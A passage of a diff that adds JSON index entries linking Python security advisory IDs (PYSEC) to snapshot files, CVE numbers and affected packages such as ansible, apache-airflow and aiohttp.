+
{
|
| 437 |
+
"osv_id": "PYSEC-2020-2",
|
| 438 |
+
"file": "data/snapshots/PYSEC-2020-2.json",
|
| 439 |
+
"cve_id": "CVE-2020-10691",
|
| 440 |
+
"package": "ansible"
|
| 441 |
+
},
|
| 442 |
+
{
|
| 443 |
+
"osv_id": "PYSEC-2020-20",
|
| 444 |
+
"file": "data/snapshots/PYSEC-2020-20.json",
|
| 445 |
+
"cve_id": "CVE-2020-17513",
|
| 446 |
+
"package": "apache-airflow"
|
| 447 |
+
},
|
| 448 |
+
{
|
| 449 |
+
"osv_id": "PYSEC-2020-200",
|
| 450 |
+
"file": "data/snapshots/PYSEC-2020-200.json",
|
| 451 |
+
"cve_id": "CVE-2014-4658",
|
| 452 |
+
"package": "ansible"
|
| 453 |
+
},
|
| 454 |
+
{
|
| 455 |
+
"osv_id": "PYSEC-2020-201",
|
| 456 |
+
"file": "data/snapshots/PYSEC-2020-201.json",
|
| 457 |
+
"cve_id": "CVE-2014-4659",
|
| 458 |
+
"package": "ansible"
|
| 459 |
+
},
|
| 460 |
+
{
|
| 461 |
+
"osv_id": "PYSEC-2020-202",
|
| 462 |
+
"file": "data/snapshots/PYSEC-2020-202.json",
|
| 463 |
+
"cve_id": "CVE-2014-4660",
|
| 464 |
+
"package": "ansible"
|
| 465 |
+
},
|
| 466 |
+
{
|
| 467 |
+
"osv_id": "PYSEC-2020-203",
|
| 468 |
+
"file": "data/snapshots/PYSEC-2020-203.json",
|
| 469 |
+
"cve_id": "CVE-2014-4678",
|
| 470 |
+
"package": "ansible"
|
| 471 |
+
},
|
| 472 |
+
{
|
| 473 |
+
"osv_id": "PYSEC-2020-204",
|
| 474 |
+
"file": "data/snapshots/PYSEC-2020-204.json",
|
| 475 |
+
"cve_id": "CVE-2014-4966",
|
| 476 |
+
"package": "ansible"
|
| 477 |
+
},
|
| 478 |
+
{
|
| 479 |
+
"osv_id": "PYSEC-2020-205",
|
| 480 |
+
"file": "data/snapshots/PYSEC-2020-205.json",
|
| 481 |
+
"cve_id": "CVE-2014-4967",
|
| 482 |
+
"package": "ansible"
|
| 483 |
+
},
|
| 484 |
+
{
|
| 485 |
+
"osv_id": "PYSEC-2020-206",
|
| 486 |
+
"file": "data/snapshots/PYSEC-2020-206.json",
|
| 487 |
+
"cve_id": "CVE-2019-14905",
|
| 488 |
+
"package": "ansible"
|
| 489 |
+
},
|
| 490 |
+
{
|
| 491 |
+
"osv_id": "PYSEC-2020-207",
|
| 492 |
+
"file": "data/snapshots/PYSEC-2020-207.json",
|
| 493 |
+
"cve_id": "CVE-2020-10684",
|
| 494 |
+
"package": "ansible"
|
| 495 |
+
},
|
| 496 |
+
{
|
| 497 |
+
"osv_id": "PYSEC-2020-208",
|
| 498 |
+
"file": "data/snapshots/PYSEC-2020-208.json",
|
| 499 |
+
"cve_id": "CVE-2020-10744",
|
| 500 |
+
"package": "ansible"
|
| 501 |
+
},
|
| 502 |
+
{
|
| 503 |
+
"osv_id": "PYSEC-2020-209",
|
| 504 |
+
"file": "data/snapshots/PYSEC-2020-209.json",
|
| 505 |
+
"cve_id": "CVE-2020-14365",
|
| 506 |
+
"package": "ansible"
|
| 507 |
+
},
|
| 508 |
+
{
|
| 509 |
+
"osv_id": "PYSEC-2020-21",
|
| 510 |
+
"file": "data/snapshots/PYSEC-2020-21.json",
|
| 511 |
+
"cve_id": "CVE-2020-17515",
|
| 512 |
+
"package": "apache-airflow"
|
| 513 |
+
},
|
| 514 |
+
{
|
| 515 |
+
"osv_id": "PYSEC-2020-210",
|
| 516 |
+
"file": "data/snapshots/PYSEC-2020-210.json",
|
| 517 |
+
"cve_id": "CVE-2020-1753",
|
| 518 |
+
"package": "ansible"
|
| 519 |
+
},
|
| 520 |
+
{
|
| 521 |
+
"osv_id": "PYSEC-2020-22",
|
| 522 |
+
"file": "data/snapshots/PYSEC-2020-22.json",
|
| 523 |
+
"cve_id": "CVE-2020-17526",
|
| 524 |
+
"package": "apache-airflow"
|
| 525 |
+
},
|
| 526 |
+
{
|
| 527 |
+
"osv_id": "PYSEC-2020-220",
|
| 528 |
+
"file": "data/snapshots/PYSEC-2020-220.json",
|
| 529 |
+
"cve_id": "CVE-2020-25635",
|
| 530 |
+
"package": "ansible"
|
| 531 |
+
},
|
| 532 |
+
{
|
| 533 |
+
"osv_id": "PYSEC-2020-221",
|
| 534 |
+
"file": "data/snapshots/PYSEC-2020-221.json",
|
| 535 |
+
"cve_id": null,
|
| 536 |
+
"package": "ansible"
|
| 537 |
+
},
|
| 538 |
+
{
|
| 539 |
+
"osv_id": "PYSEC-2020-23",
|
| 540 |
+
"file": "data/snapshots/PYSEC-2020-23.json",
|
| 541 |
+
"cve_id": "CVE-2020-9485",
|
| 542 |
+
"package": "apache-airflow"
|
| 543 |
+
},
|
| 544 |
+
{
|
| 545 |
+
"osv_id": "PYSEC-2020-262",
|
| 546 |
+
"file": "data/snapshots/PYSEC-2020-262.json",
|
| 547 |
+
"cve_id": "CVE-2020-17511",
|
| 548 |
+
"package": "apache-airflow"
|
| 549 |
+
},
|
| 550 |
+
{
|
| 551 |
+
"osv_id": "PYSEC-2020-3",
|
| 552 |
+
"file": "data/snapshots/PYSEC-2020-3.json",
|
| 553 |
+
"cve_id": "CVE-2020-14330",
|
| 554 |
+
"package": "ansible"
|
| 555 |
+
},
|
| 556 |
+
{
|
| 557 |
+
"osv_id": "PYSEC-2020-4",
|
| 558 |
+
"file": "data/snapshots/PYSEC-2020-4.json",
|
| 559 |
+
"cve_id": "CVE-2020-14332",
|
| 560 |
+
"package": "ansible"
|
| 561 |
+
},
|
| 562 |
+
{
|
| 563 |
+
"osv_id": "PYSEC-2020-5",
|
| 564 |
+
"file": "data/snapshots/PYSEC-2020-5.json",
|
| 565 |
+
"cve_id": "CVE-2020-1733",
|
| 566 |
+
"package": "ansible"
|
| 567 |
+
},
|
| 568 |
+
{
|
| 569 |
+
"osv_id": "PYSEC-2020-6",
|
| 570 |
+
"file": "data/snapshots/PYSEC-2020-6.json",
|
| 571 |
+
"cve_id": "CVE-2020-1734",
|
| 572 |
+
"package": "ansible"
|
| 573 |
+
},
|
| 574 |
+
{
|
| 575 |
+
"osv_id": "PYSEC-2020-7",
|
| 576 |
+
"file": "data/snapshots/PYSEC-2020-7.json",
|
| 577 |
+
"cve_id": "CVE-2020-1735",
|
| 578 |
+
"package": "ansible"
|
| 579 |
+
},
|
| 580 |
+
{
|
| 581 |
+
"osv_id": "PYSEC-2020-8",
|
| 582 |
+
"file": "data/snapshots/PYSEC-2020-8.json",
|
| 583 |
+
"cve_id": "CVE-2020-1736",
|
| 584 |
+
"package": "ansible"
|
| 585 |
+
},
|
| 586 |
+
{
|
| 587 |
+
"osv_id": "PYSEC-2020-9",
|
| 588 |
+
"file": "data/snapshots/PYSEC-2020-9.json",
|
| 589 |
+
"cve_id": "CVE-2020-1737",
|
| 590 |
+
"package": "ansible"
|
| 591 |
+
},
|
| 592 |
+
{
|
| 593 |
+
"osv_id": "PYSEC-2021-1",
|
| 594 |
+
"file": "data/snapshots/PYSEC-2021-1.json",
|
| 595 |
+
"cve_id": "CVE-2021-20228",
|
| 596 |
+
"package": "ansible"
|
| 597 |
+
},
|
| 598 |
+
{
|
| 599 |
+
"osv_id": "PYSEC-2021-105",
|
| 600 |
+
"file": "data/snapshots/PYSEC-2021-105.json",
|
| 601 |
+
"cve_id": "CVE-2020-10729",
|
| 602 |
+
"package": "ansible"
|
| 603 |
+
},
|
| 604 |
+
{
|
| 605 |
+
"osv_id": "PYSEC-2021-106",
|
| 606 |
+
"file": "data/snapshots/PYSEC-2021-106.json",
|
| 607 |
+
"cve_id": "CVE-2021-20178",
|
| 608 |
+
"package": "ansible"
|
| 609 |
+
},
|
| 610 |
+
{
|
| 611 |
+
"osv_id": "PYSEC-2021-107",
|
| 612 |
+
"file": "data/snapshots/PYSEC-2021-107.json",
|
| 613 |
+
"cve_id": "CVE-2021-3447",
|
| 614 |
+
"package": "ansible"
|
| 615 |
+
},
|
| 616 |
+
{
|
| 617 |
+
"osv_id": "PYSEC-2021-122",
|
| 618 |
+
"file": "data/snapshots/PYSEC-2021-122.json",
|
| 619 |
+
"cve_id": "CVE-2021-35936",
|
| 620 |
+
"package": "apache-airflow"
|
| 621 |
+
},
|
| 622 |
+
{
|
| 623 |
+
"osv_id": "PYSEC-2021-124",
|
| 624 |
+
"file": "data/snapshots/PYSEC-2021-124.json",
|
| 625 |
+
"cve_id": "CVE-2021-20191",
|
| 626 |
+
"package": "ansible"
|
| 627 |
+
},
|
| 628 |
+
{
|
| 629 |
+
"osv_id": "PYSEC-2021-125",
|
| 630 |
+
"file": "data/snapshots/PYSEC-2021-125.json",
|
| 631 |
+
"cve_id": null,
|
| 632 |
+
"package": "ansible"
|
| 633 |
+
},
|
| 634 |
+
{
|
| 635 |
+
"osv_id": "PYSEC-2021-126",
|
| 636 |
+
"file": "data/snapshots/PYSEC-2021-126.json",
|
| 637 |
+
"cve_id": "CVE-2021-3533",
|
| 638 |
+
"package": "ansible"
|
| 639 |
+
},
|
| 640 |
+
{
|
| 641 |
+
"osv_id": "PYSEC-2021-2",
|
| 642 |
+
"file": "data/snapshots/PYSEC-2021-2.json",
|
| 643 |
+
"cve_id": "CVE-2021-26559",
|
| 644 |
+
"package": "apache-airflow"
|
| 645 |
+
},
|
| 646 |
+
{
|
| 647 |
+
"osv_id": "PYSEC-2021-3",
|
| 648 |
+
"file": "data/snapshots/PYSEC-2021-3.json",
|
| 649 |
+
"cve_id": "CVE-2021-26697",
|
| 650 |
+
"package": "apache-airflow"
|
| 651 |
+
},
|
| 652 |
+
{
|
| 653 |
+
"osv_id": "PYSEC-2021-326",
|
| 654 |
+
"file": "data/snapshots/PYSEC-2021-326.json",
|
| 655 |
+
"cve_id": "CVE-2021-38540",
|
| 656 |
+
"package": "apache-airflow"
|
| 657 |
+
},
|
| 658 |
+
{
|
| 659 |
+
"osv_id": "PYSEC-2021-335",
|
| 660 |
+
"file": "data/snapshots/PYSEC-2021-335.json",
|
| 661 |
+
"cve_id": "CVE-2021-32807",
|
| 662 |
+
"package": "accesscontrol"
|
| 663 |
+
},
|
| 664 |
+
{
|
| 665 |
+
"osv_id": "PYSEC-2021-358",
|
| 666 |
+
"file": "data/snapshots/PYSEC-2021-358.json",
|
| 667 |
+
"cve_id": "CVE-2021-3583",
|
| 668 |
+
"package": "ansible"
|
| 669 |
+
},
|
| 670 |
+
{
|
| 671 |
+
"osv_id": "PYSEC-2021-370",
|
| 672 |
+
"file": "data/snapshots/PYSEC-2021-370.json",
|
| 673 |
+
"cve_id": "CVE-2021-32807",
|
| 674 |
+
"package": "accesscontrol"
|
| 675 |
+
},
|
| 676 |
+
{
|
| 677 |
+
"osv_id": "PYSEC-2021-4",
|
| 678 |
+
"file": "data/snapshots/PYSEC-2021-4.json",
|
| 679 |
+
"cve_id": "CVE-2021-28359",
|
| 680 |
+
"package": "apache-airflow"
|
| 681 |
+
},
|
| 682 |
+
{
|
| 683 |
+
"osv_id": "PYSEC-2021-76",
|
| 684 |
+
"file": "data/snapshots/PYSEC-2021-76.json",
|
| 685 |
+
"cve_id": "CVE-2021-21330",
|
| 686 |
+
"package": "aiohttp"
|
| 687 |
+
},
|
| 688 |
+
{
|
| 689 |
+
"osv_id": "PYSEC-2021-839",
|
| 690 |
+
"file": "data/snapshots/PYSEC-2021-839.json",
|
| 691 |
+
"cve_id": "CVE-2021-43775",
|
| 692 |
+
"package": "aim"
|
| 693 |
+
},
|
| 694 |
+
{
|
| 695 |
+
"osv_id": "PYSEC-2021-840",
|
| 696 |
+
"file": "data/snapshots/PYSEC-2021-840.json",
|
| 697 |
+
"cve_id": "CVE-2021-3840",
|
| 698 |
+
"package": "antilles-tools"
|
| 699 |
+
},
|
| 700 |
+
{
|
| 701 |
+
"osv_id": "PYSEC-2021-876",
|
| 702 |
+
"file": "data/snapshots/PYSEC-2021-876.json",
|
| 703 |
+
"cve_id": "CVE-2020-13922",
|
| 704 |
+
"package": "apache-dolphinscheduler"
|
| 705 |
+
},
|
| 706 |
+
{
|
| 707 |
+
"osv_id": "PYSEC-2022-11",
|
| 708 |
+
"file": "data/snapshots/PYSEC-2022-11.json",
|
| 709 |
+
"cve_id": "CVE-2021-45230",
|
| 710 |
+
"package": "apache-airflow"
|
| 711 |
+
},
|
| 712 |
+
{
|
| 713 |
+
"osv_id": "PYSEC-2022-164",
|
| 714 |
+
"file": "data/snapshots/PYSEC-2022-164.json",
|
| 715 |
+
"cve_id": "CVE-2021-3620",
|
| 716 |
+
"package": "ansible"
|
| 717 |
+
},
|
| 718 |
+
{
|
| 719 |
+
"osv_id": "PYSEC-2022-176",
|
| 720 |
+
"file": "data/snapshots/PYSEC-2022-176.json",
|
| 721 |
+
"cve_id": "CVE-2022-25598",
|
| 722 |
+
"package": "apache-dolphinscheduler"
|
| 723 |
+
},
|
| 724 |
+
{
|
| 725 |
+
"osv_id": "PYSEC-2022-182",
|
| 726 |
+
"file": "data/snapshots/PYSEC-2022-182.json",
|
| 727 |
+
"cve_id": "CVE-2018-25033",
|
| 728 |
+
"package": "admesh"
|
| 729 |
+
},
|
| 730 |
+
{
|
| 731 |
+
"osv_id": "PYSEC-2022-253",
|
| 732 |
+
"file": "data/snapshots/PYSEC-2022-253.json",
|
| 733 |
+
"cve_id": "CVE-2021-4041",
|
| 734 |
+
"package": "ansible-runner"
|
| 735 |
+
},
|
| 736 |
+
{
|
| 737 |
+
"osv_id": "PYSEC-2022-261",
|
| 738 |
+
"file": "data/snapshots/PYSEC-2022-261.json",
|
| 739 |
+
"cve_id": "CVE-2022-38170",
|
| 740 |
+
"package": "apache-airflow"
|
| 741 |
+
},
|
| 742 |
+
{
|
| 743 |
+
"osv_id": "PYSEC-2022-263",
|
| 744 |
+
"file": "data/snapshots/PYSEC-2022-263.json",
|
| 745 |
+
"cve_id": "CVE-2022-38054",
|
| 746 |
+
"package": "apache-airflow"
|
| 747 |
+
},
|
| 748 |
+
{
|
| 749 |
+
"osv_id": "PYSEC-2022-279",
|
| 750 |
+
"file": "data/snapshots/PYSEC-2022-279.json",
|
| 751 |
+
"cve_id": "CVE-2022-40604",
|
| 752 |
+
"package": "apache-airflow"
|
| 753 |
+
},
|
| 754 |
+
{
|
| 755 |
+
"osv_id": "PYSEC-2022-280",
|
| 756 |
+
"file": "data/snapshots/PYSEC-2022-280.json",
|
| 757 |
+
"cve_id": "CVE-2022-40754",
|
| 758 |
+
"package": "apache-airflow"
|
| 759 |
+
},
|
| 760 |
+
{
|
| 761 |
+
"osv_id": "PYSEC-2022-29",
|
| 762 |
+
"file": "data/snapshots/PYSEC-2022-29.json",
|
| 763 |
+
"cve_id": "CVE-2021-45229",
|
| 764 |
+
"package": "apache-airflow"
|
| 765 |
+
},
|
| 766 |
+
{
|
| 767 |
+
"osv_id": "PYSEC-2022-30",
|
| 768 |
+
"file": "data/snapshots/PYSEC-2022-30.json",
|
| 769 |
+
"cve_id": "CVE-2022-24288",
|
| 770 |
+
"package": "apache-airflow"
|
| 771 |
+
},
|
| 772 |
+
{
|
| 773 |
+
"osv_id": "PYSEC-2022-42970",
|
| 774 |
+
"file": "data/snapshots/PYSEC-2022-42970.json",
|
| 775 |
+
"cve_id": "CVE-2022-43982",
|
| 776 |
+
"package": "apache-airflow"
|
| 777 |
+
},
|
| 778 |
+
{
|
| 779 |
+
"osv_id": "PYSEC-2022-42971",
|
| 780 |
+
"file": "data/snapshots/PYSEC-2022-42971.json",
|
| 781 |
+
"cve_id": "CVE-2022-43985",
|
| 782 |
+
"package": "apache-airflow"
|
| 783 |
+
},
|
| 784 |
+
{
|
| 785 |
+
"osv_id": "PYSEC-2022-42972",
|
| 786 |
+
"file": "data/snapshots/PYSEC-2022-42972.json",
|
| 787 |
+
"cve_id": "CVE-2022-43766",
|
| 788 |
+
"package": "apache-iotdb"
|
| 789 |
+
},
|
| 790 |
+
{
|
| 791 |
+
"osv_id": "PYSEC-2022-42981",
|
| 792 |
+
"file": "data/snapshots/PYSEC-2022-42981.json",
|
| 793 |
+
"cve_id": "CVE-2022-27949",
|
| 794 |
+
"package": "apache-airflow"
|
| 795 |
+
},
|
| 796 |
+
{
|
| 797 |
+
"osv_id": "PYSEC-2022-42982",
|
| 798 |
+
"file": "data/snapshots/PYSEC-2022-42982.json",
|
| 799 |
+
"cve_id": "CVE-2022-40127",
|
| 800 |
+
"package": "apache-airflow"
|
| 801 |
+
},
|
| 802 |
+
{
|
| 803 |
+
"osv_id": "PYSEC-2022-42983",
|
| 804 |
+
"file": "data/snapshots/PYSEC-2022-42983.json",
|
| 805 |
+
"cve_id": "CVE-2022-41672",
|
| 806 |
+
"package": "apache-airflow"
|
| 807 |
+
},
|
| 808 |
+
{
|
| 809 |
+
"osv_id": "PYSEC-2022-42984",
|
| 810 |
+
"file": "data/snapshots/PYSEC-2022-42984.json",
|
| 811 |
+
"cve_id": "CVE-2022-45402",
|
| 812 |
+
"package": "apache-airflow"
|
| 813 |
+
},
|
| 814 |
+
{
|
| 815 |
+
"osv_id": "PYSEC-2022-43059",
|
| 816 |
+
"file": "data/snapshots/PYSEC-2022-43059.json",
|
| 817 |
+
"cve_id": null,
|
| 818 |
+
"package": "aiohttp"
|
| 819 |
+
},
|
| 820 |
+
{
|
| 821 |
+
"osv_id": "PYSEC-2022-43060",
|
| 822 |
+
"file": "data/snapshots/PYSEC-2022-43060.json",
|
| 823 |
+
"cve_id": "CVE-2022-32531",
|
| 824 |
+
"package": "apache-bookkeeper-client"
|
| 825 |
+
},
|
| 826 |
+
{
|
| 827 |
+
"osv_id": "PYSEC-2022-43066",
|
| 828 |
+
"file": "data/snapshots/PYSEC-2022-43066.json",
|
| 829 |
+
"cve_id": null,
|
| 830 |
+
"package": "aamiles"
|
| 831 |
+
},
|
| 832 |
+
{
|
| 833 |
+
"osv_id": "PYSEC-2022-43067",
|
| 834 |
+
"file": "data/snapshots/PYSEC-2022-43067.json",
|
| 835 |
+
"cve_id": "CVE-2021-3701",
|
| 836 |
+
"package": "ansible-runner"
|
| 837 |
+
},
|
| 838 |
+
{
|
| 839 |
+
"osv_id": "PYSEC-2022-43068",
|
| 840 |
+
"file": "data/snapshots/PYSEC-2022-43068.json",
|
| 841 |
+
"cve_id": "CVE-2021-3702",
|
| 842 |
+
"package": "ansible-runner"
|
| 843 |
+
},
|
| 844 |
+
{
|
| 845 |
+
"osv_id": "PYSEC-2022-43069",
|
| 846 |
+
"file": "data/snapshots/PYSEC-2022-43069.json",
|
| 847 |
+
"cve_id": "CVE-2022-38369",
|
| 848 |
+
"package": "apache-iotdb"
|
| 849 |
+
},
|
| 850 |
+
{
|
| 851 |
+
"osv_id": "PYSEC-2022-43070",
|
| 852 |
+
"file": "data/snapshots/PYSEC-2022-43070.json",
|
| 853 |
+
"cve_id": null,
|
| 854 |
+
"package": "apache-iotdb"
|
| 855 |
+
},
|
| 856 |
+
{
|
| 857 |
+
"osv_id": "PYSEC-2023-1",
|
| 858 |
+
"file": "data/snapshots/PYSEC-2023-1.json",
|
| 859 |
+
"cve_id": null,
|
| 860 |
+
"package": "adyen"
|
| 861 |
+
},
|
| 862 |
+
{
|
| 863 |
+
"osv_id": "PYSEC-2023-103",
|
| 864 |
+
"file": "data/snapshots/PYSEC-2023-103.json",
|
| 865 |
+
"cve_id": "CVE-2022-46651",
|
| 866 |
+
"package": "apache-airflow"
|
| 867 |
+
},
|
| 868 |
+
{
|
| 869 |
+
"osv_id": "PYSEC-2023-104",
|
| 870 |
+
"file": "data/snapshots/PYSEC-2023-104.json",
|
| 871 |
+
"cve_id": "CVE-2023-22887",
|
| 872 |
+
"package": "apache-airflow"
|
| 873 |
+
},
|
| 874 |
+
{
|
| 875 |
+
"osv_id": "PYSEC-2023-105",
|
| 876 |
+
"file": "data/snapshots/PYSEC-2023-105.json",
|
| 877 |
+
"cve_id": "CVE-2023-22888",
|
| 878 |
+
"package": "apache-airflow"
|
| 879 |
+
},
|
| 880 |
+
{
|
| 881 |
+
"osv_id": "PYSEC-2023-106",
|
| 882 |
+
"file": "data/snapshots/PYSEC-2023-106.json",
|
| 883 |
+
"cve_id": "CVE-2023-36543",
|
| 884 |
+
"package": "apache-airflow"
|
| 885 |
+
},
|
| 886 |
+
{
|
| 887 |
+
"osv_id": "PYSEC-2023-119",
|
| 888 |
+
"file": "data/snapshots/PYSEC-2023-119.json",
|
| 889 |
+
"cve_id": "CVE-2023-35908",
|
| 890 |
+
"package": "apache-airflow"
|
| 891 |
+
},
|
| 892 |
+
{
|
| 893 |
+
"osv_id": "PYSEC-2023-120",
|
| 894 |
+
"file": "data/snapshots/PYSEC-2023-120.json",
|
| 895 |
+
"cve_id": "CVE-2023-37276",
|
| 896 |
+
"package": "aiohttp"
|
| 897 |
+
},
|
| 898 |
+
{
|
| 899 |
+
"osv_id": "PYSEC-2023-134",
|
| 900 |
+
"file": "data/snapshots/PYSEC-2023-134.json",
|
| 901 |
+
"cve_id": "CVE-2023-39508",
|
| 902 |
+
"package": "apache-airflow"
|
| 903 |
+
},
|
| 904 |
+
{
|
| 905 |
+
"osv_id": "PYSEC-2023-136",
|
| 906 |
+
"file": "data/snapshots/PYSEC-2023-136.json",
|
| 907 |
+
"cve_id": "CVE-2023-39553",
|
| 908 |
+
"package": "apache-airflow"
|
| 909 |
+
},
|
| 910 |
+
{
|
| 911 |
+
"osv_id": "PYSEC-2023-152",
|
| 912 |
+
"file": "data/snapshots/PYSEC-2023-152.json",
|
| 913 |
+
"cve_id": "CVE-2023-37379",
|
| 914 |
+
"package": "apache-airflow"
|
| 915 |
+
},
|
| 916 |
+
{
|
| 917 |
+
"osv_id": "PYSEC-2023-156",
|
| 918 |
+
"file": "data/snapshots/PYSEC-2023-156.json",
|
| 919 |
+
"cve_id": "CVE-2023-40195",
|
| 920 |
+
"package": "apache-airflow-providers-apache-spark"
|
| 921 |
+
},
|
| 922 |
+
{
|
| 923 |
+
"osv_id": "PYSEC-2023-158",
|
| 924 |
+
"file": "data/snapshots/PYSEC-2023-158.json",
|
| 925 |
+
"cve_id": "CVE-2023-40273",
|
| 926 |
+
"package": "apache-airflow"
|
| 927 |
+
},
|
| 928 |
+
{
|
| 929 |
+
"osv_id": "PYSEC-2023-170",
|
| 930 |
+
"file": "data/snapshots/PYSEC-2023-170.json",
|
| 931 |
+
"cve_id": "CVE-2023-40611",
|
| 932 |
+
"package": "apache-airflow"
|
| 933 |
+
},
|
| 934 |
+
{
|
| 935 |
+
"osv_id": "PYSEC-2023-171",
|
| 936 |
+
"file": "data/snapshots/PYSEC-2023-171.json",
|
| 937 |
+
"cve_id": "CVE-2023-40712",
|
| 938 |
+
"package": "apache-airflow"
|
| 939 |
+
},
|
| 940 |
+
{
|
| 941 |
+
"osv_id": "PYSEC-2023-197",
|
| 942 |
+
"file": "data/snapshots/PYSEC-2023-197.json",
|
| 943 |
+
"cve_id": "CVE-2023-42663",
|
| 944 |
+
"package": "apache-airflow"
|
| 945 |
+
},
|
| 946 |
+
{
|
| 947 |
+
"osv_id": "PYSEC-2023-2",
|
| 948 |
+
"file": "data/snapshots/PYSEC-2023-2.json",
|
| 949 |
+
"cve_id": "CVE-2023-25695",
|
| 950 |
+
"package": "apache-airflow"
|
| 951 |
+
},
|
| 952 |
+
{
|
| 953 |
+
"osv_id": "PYSEC-2023-202",
|
| 954 |
+
"file": "data/snapshots/PYSEC-2023-202.json",
|
| 955 |
+
"cve_id": "CVE-2023-42780",
|
| 956 |
+
"package": "apache-airflow"
|
| 957 |
+
},
|
| 958 |
+
{
|
| 959 |
+
"osv_id": "PYSEC-2023-203",
|
| 960 |
+
"file": "data/snapshots/PYSEC-2023-203.json",
|
| 961 |
+
"cve_id": "CVE-2023-42792",
|
| 962 |
+
"package": "apache-airflow"
|
| 963 |
+
},
|
| 964 |
+
{
|
| 965 |
+
"osv_id": "PYSEC-2023-204",
|
| 966 |
+
"file": "data/snapshots/PYSEC-2023-204.json",
|
| 967 |
+
"cve_id": "CVE-2023-45348",
|
| 968 |
+
"package": "apache-airflow"
|
| 969 |
+
},
|
| 970 |
+
{
|
| 971 |
+
"osv_id": "PYSEC-2023-218",
|
| 972 |
+
"file": "data/snapshots/PYSEC-2023-218.json",
|
| 973 |
+
"cve_id": "CVE-2023-46288",
|
| 974 |
+
"package": "apache-airflow"
|
| 975 |
+
},
|
| 976 |
+
{
|
| 977 |
+
"osv_id": "PYSEC-2023-231",
|
| 978 |
+
"file": "data/snapshots/PYSEC-2023-231.json",
|
| 979 |
+
"cve_id": "CVE-2023-42781",
|
| 980 |
+
"package": "apache-airflow"
|
| 981 |
+
},
|
| 982 |
+
{
|
| 983 |
+
"osv_id": "PYSEC-2023-232",
|
| 984 |
+
"file": "data/snapshots/PYSEC-2023-232.json",
|
| 985 |
+
"cve_id": "CVE-2023-47037",
|
| 986 |
+
"package": "apache-airflow"
|
| 987 |
+
},
|
| 988 |
+
{
|
| 989 |
+
"osv_id": "PYSEC-2023-246",
|
| 990 |
+
"file": "data/snapshots/PYSEC-2023-246.json",
|
| 991 |
+
"cve_id": "CVE-2023-47627",
|
| 992 |
+
"package": "aiohttp"
|
| 993 |
+
},
|
| 994 |
+
{
|
| 995 |
+
"osv_id": "PYSEC-2023-247",
|
| 996 |
+
"file": "data/snapshots/PYSEC-2023-247.json",
|
| 997 |
+
"cve_id": "CVE-2023-47641",
|
| 998 |
+
"package": "aiohttp"
|
| 999 |
+
},
|
| 1000 |
+
{
|
| 1001 |
+
"osv_id": "PYSEC-2023-250",
|
| 1002 |
+
"file": "data/snapshots/PYSEC-2023-250.json",
|
| 1003 |
+
"cve_id": "CVE-2023-49081",
|
| 1004 |
+
"package": "aiohttp"
|
| 1005 |
+
},
|
| 1006 |
+
{
|
| 1007 |
+
"osv_id": "PYSEC-2023-251",
|
| 1008 |
+
"file": "data/snapshots/PYSEC-2023-251.json",
|
| 1009 |
+
"cve_id": "CVE-2023-49082",
|
| 1010 |
+
"package": "aiohttp"
|
| 1011 |
+
},
|
| 1012 |
+
{
|
| 1013 |
+
"osv_id": "PYSEC-2023-263",
|
| 1014 |
+
"file": "data/snapshots/PYSEC-2023-263.json",
|
| 1015 |
+
"cve_id": null,
|
| 1016 |
+
"package": "admesh"
|
| 1017 |
+
},
|
| 1018 |
+
{
|
| 1019 |
+
"osv_id": "PYSEC-2023-264",
|
| 1020 |
+
"file": "data/snapshots/PYSEC-2023-264.json",
|
| 1021 |
+
"cve_id": "CVE-2023-47265",
|
| 1022 |
+
"package": "apache-airflow"
|
| 1023 |
+
},
|
| 1024 |
+
{
|
| 1025 |
+
"osv_id": "PYSEC-2023-265",
|
| 1026 |
+
"file": "data/snapshots/PYSEC-2023-265.json",
|
| 1027 |
+
"cve_id": "CVE-2023-48291",
|
| 1028 |
+
"package": "apache-airflow"
|
| 1029 |
+
},
|
| 1030 |
+
{
|
| 1031 |
+
"osv_id": "PYSEC-2023-266",
|
| 1032 |
+
"file": "data/snapshots/PYSEC-2023-266.json",
|
| 1033 |
+
"cve_id": "CVE-2023-49920",
|
| 1034 |
+
"package": "apache-airflow"
|
| 1035 |
+
},
|
| 1036 |
+
{
|
| 1037 |
+
"osv_id": "PYSEC-2023-267",
|
| 1038 |
+
"file": "data/snapshots/PYSEC-2023-267.json",
|
| 1039 |
+
"cve_id": "CVE-2023-50783",
|
| 1040 |
+
"package": "apache-airflow"
|
| 1041 |
+
},
|
| 1042 |
+
{
|
| 1043 |
+
"osv_id": "PYSEC-2023-268",
|
| 1044 |
+
"file": "data/snapshots/PYSEC-2023-268.json",
|
| 1045 |
+
"cve_id": "CVE-2023-48796",
|
| 1046 |
+
"package": "apache-dolphinscheduler"
|
| 1047 |
+
},
|
| 1048 |
+
{
|
| 1049 |
+
"osv_id": "PYSEC-2023-3",
|
| 1050 |
+
"file": "data/snapshots/PYSEC-2023-3.json",
|
| 1051 |
+
"cve_id": "CVE-2023-28707",
|
| 1052 |
+
"package": "apache-airflow"
|
| 1053 |
+
},
|
| 1054 |
+
{
|
| 1055 |
+
"osv_id": "PYSEC-2023-4",
|
| 1056 |
+
"file": "data/snapshots/PYSEC-2023-4.json",
|
| 1057 |
+
"cve_id": "CVE-2022-45875",
|
| 1058 |
+
"package": "apache-dolphinscheduler"
|
| 1059 |
+
},
|
| 1060 |
+
{
|
| 1061 |
+
"osv_id": "PYSEC-2023-5",
|
| 1062 |
+
"file": "data/snapshots/PYSEC-2023-5.json",
|
| 1063 |
+
"cve_id": "CVE-2023-24829",
|
| 1064 |
+
"package": "apache-iotdb"
|
| 1065 |
+
},
|
| 1066 |
+
{
|
| 1067 |
+
"osv_id": "PYSEC-2023-59",
|
| 1068 |
+
"file": "data/snapshots/PYSEC-2023-59.json",
|
| 1069 |
+
"cve_id": "CVE-2023-25754",
|
| 1070 |
+
"package": "apache-airflow"
|
| 1071 |
+
},
|
| 1072 |
+
{
|
| 1073 |
+
"osv_id": "PYSEC-2023-6",
|
| 1074 |
+
"file": "data/snapshots/PYSEC-2023-6.json",
|
| 1075 |
+
"cve_id": "CVE-2023-24830",
|
| 1076 |
+
"package": "apache-iotdb"
|
| 1077 |
+
},
|
| 1078 |
+
{
|
| 1079 |
+
"osv_id": "PYSEC-2023-60",
|
| 1080 |
+
"file": "data/snapshots/PYSEC-2023-60.json",
|
| 1081 |
+
"cve_id": "CVE-2023-29247",
|
| 1082 |
+
"package": "apache-airflow"
|
| 1083 |
+
},
|
| 1084 |
+
{
|
| 1085 |
+
"osv_id": "PYSEC-2023-7",
|
| 1086 |
+
"file": "data/snapshots/PYSEC-2023-7.json",
|
| 1087 |
+
"cve_id": "CVE-2023-24831",
|
| 1088 |
+
